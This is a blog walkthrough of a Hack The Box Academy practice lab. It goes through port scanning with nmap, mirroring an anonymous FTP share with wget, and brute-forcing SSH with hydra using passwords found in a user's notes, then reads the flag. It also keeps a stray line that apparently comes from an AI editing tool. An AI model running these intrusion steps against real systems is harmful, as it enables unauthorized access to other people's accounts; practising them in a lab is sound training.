DEV Community

maz4l
maz4l

Posted on • Updated on

HTB Academy: Attacking Common Services - Medium Lab

Image description

Here's an improved and edited version of your Medium post:

We were commissioned by Inlanefreight to conduct a penetration test on three different hosts to evaluate their security configurations. Our task was to identify vulnerabilities and locate a flag placed on each server to verify successful access. The flags have the format:

  • HTB{...}

In this post, we will review the security of the second server, which is an internal server within the inlanefreight.htb domain. This server manages and stores emails and files, and serves as a backup for some of the company's processes. According to internal conversations, this server is used relatively rarely and mainly for testing purposes.

Task

Assess the target server and find the flag.txt file. Submit the contents of this file as your answer.

Solution Steps

  1. Enumerate the Target

Perform a full port scan and service enumeration on the target server:

   sudo nmap -sV -p- 10.129.xxx.xx -Pn
Enter fullscreen mode Exit fullscreen mode

Results:

   PORT      STATE SERVICE  VERSION
   22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
   53/tcp    open  domain   ISC BIND 9.16.1 (Ubuntu Linux)
   110/tcp   open  pop3     Dovecot pop3d
   995/tcp   open  ssl/pop3 Dovecot pop3d
   2121/tcp  open  ftp?
   30021/tcp open  ftp?
Enter fullscreen mode Exit fullscreen mode
  1. Download Files via FTP

Use wget to mirror the contents of the FTP server:

   wget -m --no-passive ftp://anonymous:anonymous@10.129.xxx.xx:30021/
Enter fullscreen mode Exit fullscreen mode

Output:

   --2024-08-01 09:06:31--  ftp://anonymous:anonymous@10.129.xxx.xx:30021/
   => ‘10.129.xxx.xx:30021/.listing’
   Connecting to 10.129.xxx.xx:30021... connected.
   Logging in as anonymous ... Logged in!
   ==> SYST ... done.
   ==> PWD ... done.
   ==> TYPE I ... done.
   ==> CWD not needed.
   ==> PORT ... done.
   ==> LIST ... done.

     --2024-08-01 09:06:38-- ftp://anonymous:anonymous@10.129.xxx.xx:30021/simon/
   => ‘10.129.xxx.xx:30021/simon/.listing’
   ==> CWD (1) /simon ... done.
   ==> PORT ... done.
   ==> LIST ... done.
...
   --2024-08-01 09:06:39-- ftp://anonymous:anonymous@10.129.xxx.xx:30021/simon/mynotes.txt
   => ‘10.129.xxx.xx:30021/simon/mynotes.txt’
   ==> CWD not required.
   ==> PORT ... done.
   ==> RETR mynotes.txt ... done.
   Length: 153
...
 ‘10.129.xxx.xx:30021/simon/mynotes.txt’ saved [153]

   FINISHED --2024-08-01 09:06:39--
   Total wall clock time: 8.3s
   Downloaded: 3 files, 517 in 0.002s (215 KB/s)
Enter fullscreen mode Exit fullscreen mode

View the Contents of the Downloaded File:

   cat 10.129.xxx.xx:30021/simon/mynotes.txt
Enter fullscreen mode Exit fullscreen mode

Output:

   234987123948729384293
   +23358093845098
   ThatsMyBigDog
   Rock!ng#May
   Puuuuuh7823328
   ...
Enter fullscreen mode Exit fullscreen mode
  1. Brute-Force SSH Login

Use hydra to brute-force the SSH login using the passwords found in mynotes.txt:

   hydra -l simon -P mynotes.txt -u 10.129.xxx.xx ssh
Enter fullscreen mode Exit fullscreen mode

Results:

   [22][ssh] host: 10.129.xxx.xx   login: simon   password: **************
Enter fullscreen mode Exit fullscreen mode
  1. Access the Server via SSH

Log into the server using the obtained credentials:

   ssh simon@10.129.XXX.xx
Enter fullscreen mode Exit fullscreen mode
  1. Find and Retrieve the Flag

List the contents of the home directory and display the flag:

   ls
   flag.txt  Maildir

   cat flag.txt
Enter fullscreen mode Exit fullscreen mode

Output:

   HTB{1qay2wsx3*******_******}
Enter fullscreen mode Exit fullscreen mode

By following these steps, we successfully enumerated the services on the target server, retrieved files from the FTP server, brute-forced the SSH login, and accessed the server to find the flag.
This demonstrates an effective approach to assessing the security of internal email and file management services.

Happy Hacking!

Top comments (0)